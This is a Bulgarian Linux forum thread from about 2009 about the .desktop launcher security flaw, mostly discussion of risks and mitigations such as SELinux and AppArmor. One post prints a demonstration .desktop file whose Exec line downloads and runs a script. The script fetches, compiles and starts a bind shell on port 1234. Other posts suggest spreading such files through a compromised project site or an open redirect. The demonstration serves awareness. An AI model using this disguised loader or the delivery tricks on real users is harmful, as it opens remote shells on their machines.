Linux за българи: Форуми

Май не е толкова невероятно:

http://lwn.net/Articles/318755/
http://lwn.net/Articles/319072/

"How to write a Linux virus in 5 easy steps" is a false title. It should be called:

"How to write a text file which, when downloaded deliberately and placed into a certain location, and then double-clicked, could potentially execute code within the context of the user account that ran it."

Има неща, за които съм съгласен.

Определено не е вирус, защото не отговаря на дефиницията за това, т.е не може да се самовъзпроизвежда, а се налага това да става в помощта на потребителя.

От друга страна нещо ме притесняват няколко момента, първо не се налага прикачения файл да има разширение .desktop и не се налага да е изпълним, за да може да се изпълнява какъвто и да било код с правата на потребителя. Дали ще кликваш отгоре или не е отделен въпрос.

И това gksu за което пишат е голяма недосмислица. Сега му хвърлих едно око, първо това нещо има наклонности да запомня root паролата и да не те пита повече за нея, нещо, което може да създаде много огромни главоболия ако се ползва. Освен това е написано некадърно, за нула време например открих format string бъг в него, който не е фатален, защото програмата не работи с suid привилегиии, но доказва, че е писана немарливо. Такива неща в днешни дни са рядкост:

(http://img99.imageshack.us/img99/8199/gksubz7.png)

A false sense of security is worse than a lack of security.

Ето това е най-полезното от цялата простотия. Типичен малоумен блогър (сори), а кви сравнения прави с уиндоус, приличат ми на фанатиците в дира и тук - като не познаваш нещо, млъкни си и не се излагай бе теба у смешника прост.
Това май е началото на края, чета идва ред и на БСД ;D
И за да приключа с още една мъдрост - то май уиндоус излезе по-сигурен от Убунту ;D A false sense...

//off topic

Вие току-що получихте първия албански вирус! Тъй като тук не сме много напреднали с компютрите, това е ръчен вирус! Ще ви помолим:
1 - Да изпратите същото писмо на всичките Ваши познати, които има e mail адрес.
2 - Да изтриете съдържанието на диска C

То хубаво "албански вирус", ама нещата, за които gat3way пише са сериозни.
 :(

Мисля, че малко надценявате средностатистическият потребител. Дори немалка част от линукс потребителите не са много security-aware а и дори да не са, леко си вярват в утопията, че им е сигурна платформата.

Ето го примера:

http://www.gat3way.eu/abetapak.oo

Което е доста груб пример. Ако вие както мен ползвате iceweasel (firefox) и даунлоуд-натите ви файлове отиват на десктоп-а, ще забележите че това нещо ще ви попита да запишете "MSH" файл (и не знае с какво да го отвори - съжалявам че съм избрал толкова тъп пример, ма не ми се мисли креативно по въпроса). Когато браузъра ви го запише, ще видите, че иконата на този файл наподобява по-скоро на някакъв документ, отколкото на непознат файл.

Ако кликнете веднъж отгоре (щото ползвате КДЕ като мен :) ) след малко ще ви се появи един README файл на десктопа, който ще ви информира каква грандиозна простотия сте сътворили и до какво е довела (апропо, сама по себе си простотията е безобидна, но води до доста лоши неща - затова веднага си вижте таблицата с процесите накрая и УБИЙТЕ лошия процес, за да не се възползва случаен човек от цялата работа).


Както виждате не е особено сложно. В смисъл не е чак толкова сложно човек да се заблуди да направи такава простотия.

Иначе съм съгласен, че ако си културен човек и си съзнателен, това нещо няма да мине.

Ама е забавно де, не знаех че такива глупости могат да се случват.

Аз пък си го отворих направо с kate:

[Desktop Entry]
Exec=wget http://www.gat3way.eu/prase.txt -O /tmp/prase;chmod +x /tmp/prase;/tmp/prase
Type=Application
Icon=document

#!/bin/bash
mkdir /tmp/.ops
cd /tmp/.ops
wget http://packetstormsecurity.com/advisories/suid/bindshell.c
cc -o bs bindshell.c
echo -e "WARNING!\nTo see what you've just done, type 'nc localhost 1234' !!!\nPlease kill the bindshell process ASAP!\n" > ~/Desktop/README
./bs

Хитро...

Е, разбира се, обаче ти най-малкото *знаеш* че това нещо не е наред.

Сега аз мога да развия един параноичен сценарии - примерно намира се някакъв sql injection проблем на openfmi.net, който в крайна сметка позволява манипулиране на базата им. Създавам си един проект и качвам тая глупост там, като подменям линковете на останалите проекти да сочат към тая простотия, която кръщавам "hipermiperproekt.0.4.tar.gz." да речем (с което не ТВЪРДЯ че там има такива проблеми, просто теоретично.) Някой си смъква проекта (който е с икона на архив този път) и кликва отгоре да разгледа какви файлове има вътре или пък най-малкото да го разархивира (сега друг е въпроса, че това е малоумно и че бих си създал някакъв "специален" проект, а не шибана десктоп икона).

Тогава ще бъдеш доста по-склонен да запишеш и отвориш тази глупост.

А иначе съм съгласен на 100%, че това е от нещата, които изискват предоверяване от страна на жертвите, зависи от навиците им и не е гарантирано. В някои случаи може да е по-лесно, в други да е по-трудно да ги накараш да ти се доверят.

Хм или пък нещо от сорта на това:

http://en.securitylab.ru/bitrix/redirect.php?event1=demo_out&event2=sm_demo&event3=pdemo&goto=http%3a%2f%2fwww.gat3way.eu%2fabetapak.oo

securitylab.ru се очаква да е надежден източник за смъкване на каквото и да било примерно :)

тия десктоп говна са кофти....как така тая тапотия взе, че се изпълни...
някъв .оо файл ...
gat3way те май са се осъзнали нали... тва ще го разкарат...
напиши им бъг репорт
не може да е толкова тапо...
тва само КДЕ ли го прави или и ГНОМ?
НЕ не не не не мога да се стърпя...ще го постна в lwn.net...

Какво да се репорт-ва след като това, което съм направил е илюстрация на нещо прочетено точно там (в lwn) :)

Абе има възможности за грозни изпълнения, сега като се замисля, това може да вдига едно фалшиво прокси и да промени настройките на firefox така че да се минава оттам например. Това би могло да се използва за криминални занимания :)

на КДЕ барабар с примерчето!

GNOME проверя в несъответствие между разширението и MIME типа (както тук) и предупреждава че вероятно е проблем със сигурността.

И КДЕ и гном сигурно вече си ги знаят тези проблеми :)

Все пак браво на човека дето си ги описал в блога. Сигурно звучат като глупости, обаче наистина мисля, че дават мегдан за грозни изпълнения. Защото някакъв процент от хората няма да се замислят, като кликат по разни неща и това че ползват линукс не им е никаква панацея. Тя и без това не им е панацея, но това си е подмолно. Хора, които са свикнали с графични среди и обичат да се предоверяват, биха пострадали от такива изпълнения. А и както казах, могат да се сътворяват разни схеми свързани с XSS или SQL injection проблеми, които биха подлъгали и по-опитни потребители да се доверяват.

Обаче като цяло това също така има грандиозен потенциал да се превърне в нещо крайно преекспонирано и да се взема прекалено насериозно :)

Тъпото е че наскоро купихме лаптоп за жена ми и понеже тя не може да се оправя с любимата операционна система, сложихме виста. Доскоро нямах никакви наблюдения от тъпата виста, обаче като гледам, там каквото и да смъкна се задават въпроси искам ли да се инсталира, дава някаква информация за обекта, който си кликнал и така нататък. Глупава работа, да не се окаже, че вистата все пак е малко по-разумно направена среда от КДЕ да речем :)

Само да кажа как е в MacOSX, от потребителска гледна точка, не знам как го реализират. За всяко приложение свалено от Интернет операционната система помни, че е свалено от мрежата и първия път когато се опиташ да го пуснеш предупреждава, че приложението може да е опасно. Ако все пак решиш да продължиш на своя отговорност повече не получаваш предупреждения.

Доскоро нямах никакви наблюдения от тъпата виста, обаче като гледам, там каквото и да смъкна се задават въпроси искам ли да се инсталира, дава някаква информация за обекта, който си кликнал и така нататък. Глупава работа, да не се окаже, че вистата все пак е малко по-разумно направена среда от КДЕ да речем :)

И защо да е глупаво, защото не го познаваш ли? А ако беше запознат с уиндоус щеше да знаеш, че за свалените файлове от нета или откъдето и да е, има много прост механизъм за защита отколкото при линукс.
Малко по-разумно е следното - Уиндоус ти дава много по-добра възможност за администриране на потребителя. Като си имаш инсталиран уин, правиш си един юзер и го рестрикваш отвсякъде, правиш един полиси и си готов. При линукс има много по-голямо поле на изява и даже и админа да те е заключил, в повечето случаи се оказва, че той е забравил нещо, не защото не знае, а защото може много повече работи да се човъркат.
В Уиндоус потребителя не бърка в кернела през седмица, няма счупени пакети, ненамерени библиотеки... а от това не страда "интернет и скайпето" на Иванчо, стига с тея троянци и вируси под уиндоус.

//ФАНАТИЦИТЕ ДА ЧЕТАТ И ТУК
Не защитавам другата ОС, но е хубаво нещата да се казват с истинките им имена, а не да се плюе нещо, за да се отличи друго. Линуксарът има много повече отговорности като ползва системата си отколкото другите. И не си мислите, че като преборите редмън, лошите чичковци няма да ви опънат задниците и на вас :)

http://yurukov.net/blog/2009/02/13/eto-kak-se-obira-banka-e-evropeiskiq-parlament/
security theater ;D

Отвратна е вистата сериозно, мене XP много повече си ми харесваше - имаше изчиствен и прост интерфейс. Сега интерфейсът е доста по-претруфен като гледам. Отделно някои неща не са много логични - например правиш си cleanup на диска  и включваш и последно създадения hibernate image. В следващият момент когато затваряш капака, не се случва нищо - оказва се че опцията "hibernate" отсъства, а пък sleep-а забива машинката, въпреки че ползвам най-новите драйвери от майкрософт и делл. Решението на проблема беше влизане там в тяхната административна конзола и писането на някакви команди с някакви опции. Което ме накара да се почувствам като дългогодишен уиндоус потребител на който са му връчили машинка със слакуер, демек абориген :)

А пък беше нещо ужким просто и се твърдеше че е много юзър френдли.

А, да, въпросната опция с питането преди изпълнението на каквото и да било, беше изключена по желание на жената, щото цитирам "много е досадно това". И такива работи :)

 Ха, другото забавно е фонетичната подредба, тя не е точно нормална фонетична подредба и доста дразни.

Въпреки че първоначално доста ми хареса машинчето, доста бързо се отвратих и сега ми е досадно дори когато нещо се наложи да му оправям някакви работи. 

Та тва е де...мое мнение. "Всеки си има собствен вкус" там казал песът и си облизал задника :)

Хе-хе, това с изгледа е лесно се върне на XP, не мога да ти дам точните команди=цъкания щото съм с XP, ма ако жена ти го докара у Руси, ще го оправя - но не вярвам на нея да и хареса това :)
hibernate - RAM? ;D
За вкуса е така, но не е хубаво да се плюе... млъквам, извинявам се за отклонението.

hibernate е по-скоро като suspend-to-disk, това в линукс става с писане върху суоп дяла, във вистата става с писане в някакъв скрит файл.

На XP се държи още по-зле, понеже не може да си разпознае половината хардуер като хората. Обаче тва със sleep-ването що забива машината е голям парадокс за мен, би следвало тези лаптопи да са ги тествали там...не знам. Кой знае каква точно е причината (и сигурно има някакво обяснение). Честно казано не е голям проблем, защото ние така или иначе много не го размотаваме тоя лаптоп и рядко го отваряме/затваряме, така че бавната хибернация не е чак толкова огромен проблем - нали все пак го връща във същото състояние :)

Написах решенията ми в Brainstorm-а на убунту: http://brainstorm.ubuntu.com/idea/18028/
Второто решение е доста просто, но не решава проблема напълно. Все още трябва да се приложи и първото.
Относно първото решение, няма да изисква ре-пакетиране, защото няма да изисква +x права за файлове в /usr/share/applications. Относно другите .desktop файлове, те са създадени по воля на юзъра, и на тях ще им се дава автоматично +x.

"И не си мислите, че като преборите редмън, лошите чичковци няма да ви опънат задниците и на вас"
@ por4e2: Все едно,че няма да стане нещо такова и за теб...Май го чакаш със задоволство!...
А стига!Писна ми да ти чета жалките крайностни изказвания!Като не ти харесва - сиктир!!!Никой не ти иска натрапването тук!
Всяко нещо си има някаква мярка все пак!Престъпи ли се,става нетърпимо!

Аз не разбирам много от тия десктоп работи, затва такива проблеми бих тръгнал да ги решавам по моите си начини.

Според мен, може да се направи друго - всички прикачени файлове от пощенски програми, както и нещата, смъкнати с браузърите, се записват върху диска с определен контекст. Дефинира се някакво policy - например не може да изпълнява определени неща, не може да отваря сокети, не може да пише където не трябва.

За удобство на потребителите дето цъкат може да се напише едно qt/gtk приложение, което е като графичен фронтенд на chcon за такива файлове и ги relabel-ва с по-привилегирован контекст, стига потребителят да има желанието да го направи.

Тъй като не знам за готов такъв контекст, който да върши работа, разработчиците на селинукс ще трябва да се погрижат по въпроса (на тях това им е работата).

Малко е гадно така със системни средства да се решават проблеми на графичната среда, от друга страна това би решило до известна степен и друг проблем - евентуални експлойти по браузърите и мейл клиентите биха направили живота на хахорите доста сложен, защото няма да имат достъп до файлови системи, няма да отварят сокети и няма да изпълняват каквото им дойде.

Странно че още не са се сетили да реализират подобна схема. А може би са се сетили, но има някакви проблеми, за които не мога да се сетя сега, знам ли :)

Изобщо не е гадно. В случая мястото за решаване на проблеми с изпълнение на несигурни файлове е точно системното ниво. За съжаление в Линукс нивата са толкова омешани, че вероятно ще е трудно да се направи както трябва. Между другото, има ли някоя друга дистрибуция освен Федора, която да използва selinux?

Пример за омешани нива: някой да е опитвал да suspend лаптоп с Fedora или Ubuntu когато графичната среда не работи?

Ммм центос/рхел също си идват със selinux по дефолт. Дебиан по принцип си идва със selinux, но е изключен и изрично трябва да се указва като boot опция да е активен. Рядко разглеждам някакви други дистрибуции, обикновено през qemu, не съм 100% убеден, но мисля, че и Убунту си идва със SELinux, но е в permissive режим. Но за последното може и да греша.

Ubuntu мисля че ползва apparmor.

Мда, странно е, но наистина идва с AppArmor. Това за Debian не го знаех, тамън вчера си го инсталирах на лаптопа, ще взема да го включа.

"И не си мислите, че като преборите редмън, лошите чичковци няма да ви опънат задниците и на вас"
@ por4e2: Все едно,че няма да стане нещо такова и за теб...Май го чакаш със задоволство!...
А стига!Писна ми да ти чета жалките крайностни изказвания!Като не ти харесва - сиктир!!!Никой не ти иска натрапването тук!
Всяко нещо си има някаква мярка все пак!Престъпи ли се,става нетърпимо!

At the grove I met the rest - the folk of my fantasies
Bilbo, Sparhawk, goblins and pixies
Snowman, Willow, trolls and the seven dwarves
The path goes forever on

Дишай, баце, дишайййй ;D

http://www.purinchu.net/wp/2009/02/21/desktop-file-security/

Хората работят по отстраняването на проблема :)

И заВ Уиндоус потребителя не бърка в кернела през седмица, няма счупени пакети, ненамерени библиотеки... а от това не страда "интернет и скайпето" на Иванчо, стига с тея троянци и вируси под уиндоус.

//ФАНАТИЦИТЕ ДА ЧЕТАТ И ТУК
Не защитавам другата ОС, но е хубаво нещата да се казват с истинките им имена, а не да се плюе нещо, за да се отличи друго. Линуксарът има много повече отговорности като ползва системата си отколкото другите. И не си мислите, че като преборите редмън, лошите чичковци няма да ви опънат задниците и на вас :)

Като заговорихте за Windows, моя експеримент беше 2 години Windows XP без антивирусна, със вградения файруал, сканиране за вируси с някой онлайн скенер веднъж през 2-3 месеца. Оказа се не е задължително в уиндоус да се слага антивирусна, е има потребители за които е задължително, но аз не успях като по чудо да лепна нищо, върви на пушка все още, което не мога да кажа за openSuse-то което сложих.... някак си гнома се таркаля 2 пъти по бавно от ГДИ-то на уиндоуса. Иначе като ги чета тия неща тука някак се изплаших за линукса ми  ;D